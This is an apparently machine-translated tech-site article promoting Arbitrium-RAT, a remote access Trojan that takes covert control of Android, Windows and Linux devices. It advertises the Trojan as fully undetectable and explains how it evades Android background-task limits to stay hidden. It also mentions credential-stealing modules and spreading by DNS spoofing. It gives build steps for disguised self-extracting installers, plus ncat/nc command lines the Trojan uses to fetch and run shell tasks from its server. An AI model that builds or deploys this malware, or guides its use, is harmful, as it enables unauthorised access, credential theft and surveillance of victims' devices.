Shulou(Shulou.com)06/03 Report--

This article mainly introduces how to use Arbitrium-RAT to implant remote access Trojans to Android, Windows and Linux. The article is very detailed and has a certain reference value. Interested friends must finish reading it!

About Arbitrium

Arbitrium is a cross-platform and completely undetectable remote access Trojan that can help researchers control Android, Windows and Linux operating systems without the need to configure any additional firewall rules or port forwarding rules. This tool can provide access to the local network, we can use the target device as a HTTP agent, and access the router in the target network, discover the local IP or scan the target port, and so on.

Arbitrium also comes with modules similar to Mimikatz, and supports the majority of researchers to add custom modules. In addition, if you use Arbitrium with a DNS spoofing software, you can realize the automatic transmission of the Trojan back door between the target network devices. Arbitrium is a multi-part project developed in a variety of programming languages such as Java, JS, C, Python, Cordova and VueJS.

The feature description cannot be detected at all (FUD)

The client uses simple tools, which will allow Arbitrium to be completely undetectable. Trojan horse based on netcat communication, this component is mainly responsible for processing TCP communication data through the pipeline and running commands sent by the server.

Firewalls

Arbitrium does not need to add any exclusion rules or port forwarding rules to the firewall. The server is a terminal node with API, which is responsible for receiving tasks for target hosts and other devices, because Trojans periodically request new control instructions from the server. The control command here can be a JavaScript file (the Android application uses Cordova) or a Shell file that can be run in the command line terminal. When the server receives the task of the target device, the former will set a scheduled task, then open a child process to listen on a dedicated temporary port and wait for the response from the back door of the Trojan horse. Therefore, our Trojan does not need to listen to any ports.

Battery optimization / concealment mode

Unlike the normal Android operating system, customized products such as Xiaomi's MIUI, Huawei's EMUI or Samsung's Android Pie ignore user permissions / exceptions to the application. Therefore, if you try to run the Android Trojan backdoor in the background, when the application starts to run frequent or heavy (sometimes even lightweight) tasks (such as sending regular HTTP requests), it will be terminated no matter what permissions are granted by the user, and the operating system completely ignores the current configuration.

The problem mentioned above is very annoying, but after a period of research, I found that we can continue to run assigned tasks in the background by building a lightweight binary file, while MainActivity will not do anything after starting the binary file, which can help us circumvent most of the restrictions and improve the performance of the application.

MainActivity receives a JS file from the server and starts the binaries using ThreadPoolExecutor without suspending the binaries to exit (more information about this StealthMode/BatteryBypass).

Web interface

The tool also provides a control panel, and the Web interface is optional, not required. This is a simple VueJS Web application, that is, a UI interface that can help us control our goals, rather than by sending command requests to API. [click me] visit Arbitrium WebApp.

The tool requires the Android client Java ver... CordovaAndroid SDK & NDKWindows/Linux client Python3.6 (or later) PyInquirerWinrar (Windows only) project to build

Note: you need to use setAPI_FQDN.sh to set the server domain name / IP address in all files.

Clone the project source code locally using the following command:

Git clone https://github.com/BenChaliah/Arbitrium-RAT.git-- recursiveAndroid$ cd ArbitriumClients/AndroidApp/ClientApp/$ cordova build android$ cd.. / StealthMode/$ make clean & & make buildWindows$ cd ArbitriumClients\ WindowsApp$ pyinstaller-- onefile runFrame.py$ copy Client_tools\ toolbox.exe dist\ $copy Client_tools\ SFXAutoInstaller.conf dist\ $copy Client_tools\ start_script.vbs dist\ $cd dist$ {Rar_abspath} a-r-cfg-sfx-z "SFXAutoInstaller.conf" Standalone.exe component Server API$ Pip install flask flask_cors &. / runserver.sh # Python2.7 ├── runserver.sh ├── main.py ├── reverse_http.py initProxy.py │├── assets (src: ArbitriumClients/AndroidApp/StealthMode) │ ├── runFrame_arm64-v8a │ ├── toolbox_arm64-v8a │ ├──... (x86, x86'64, armeabi-v7a) ││├── JS_scripts │ ├── checkupdate.js │ ├── init.js │ ├── runshell.js │ └── StealthMode.js │├── misc │├── modules │ ├── discover.py │ ├── mimikatz.py │ ├── ports.py │ └── runCMD.py threads terminal node

[GET] / checkupdate.js

Example: suppose you want to use the target as a HTTP proxy, API builds the request as the following command:

Echo-e "GET / HTTP/1.1\ r\ nHost: 192.168.1.1\ r\ nConnection: close\ r\ n\ n" | {abspath_toolbox/ncat} {API_HOST_IP} {lport}-w 10;\ r\ n

Then store it in assets/runsh_ {uid_task} .sh, and / checkupdate.js will let the Trojan download and execute the shell file:

> Popen ("exec $(nc-l 0.0.0.0-p {lport}-dN > {task_filename})" shell=True, close_fds=True,...) Screenshot of tool running

HTTP Agent

PowerShell

Port scan

The above is all the contents of the article "how to use Arbitrium-RAT to implant remote access Trojans to Android, Windows and Linux". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.